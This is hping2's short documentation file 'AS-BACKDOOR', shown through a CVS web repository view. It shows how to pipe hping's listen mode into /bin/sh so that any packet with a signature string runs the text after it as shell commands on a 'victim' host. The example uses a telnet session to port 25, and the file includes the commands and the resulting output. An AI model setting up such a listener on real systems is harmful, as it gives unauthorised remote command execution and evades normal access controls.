File:  [ELWIX - Embedded LightWeight unIX -] / embedaddon / hping2 / docs / AS-BACKDOOR
Revision 1.1.1.1 (vendor branch): download - view: text, annotated - select for diffs - revision graph
Tue Feb 21 22:11:37 2012 UTC (12 years, 10 months ago) by misho
Branches: hping2, MAIN
CVS tags: v2_0_0rc3p7, v2_0_0rc3p5, v2_0_0rc3p4, v2_0_0rc3p0, v2_0_0rc3, HEAD
hping2

hping can be used as a backdoor. Just try the -9 (--listen) option
and put in pipe with /bin/sh:

Put hping in listen mode in the victim host.

victim# hping -I eth0 -9 mysign | /bin/sh

Every packet that contain "mysign" will be processed by hping,
all the bytes that follows "mysign" in the packet will be dumped
to the standard output, so for example I'll able to exec commands
using all types of protocols. Just for example I can use the smtpd
to exec 'ls' in the victim.

evil$ telnet victim 25

Trying 192.168.1.1...
Connected to nano (192.168.1.1).
Escape character is '^]'.
220 nano.marmoc.net ESMTP Sendmail
mysignls;

on the victim you will see:

victim# hping -I eth0 -9 mysign | /bin/sh
hping2 listen mode
bin   cdrom  etc     home  local-home  mnt   root  tmp  var
boot  dev    export  lib   lost+found  proc  sbin  usr
: command not found

As you can see I used 'ls;' since otherwise the shell will receive
just ls^M. The ";" force the command execution (at least with bash and zsh,
check your shell for more information).

This works with all kind of valid not-filtered IP packets, the higher
level protocl does not matter.

antirez <antirez@invece.org>

FreeBSD-CVSweb <freebsd-cvsweb@FreeBSD.org>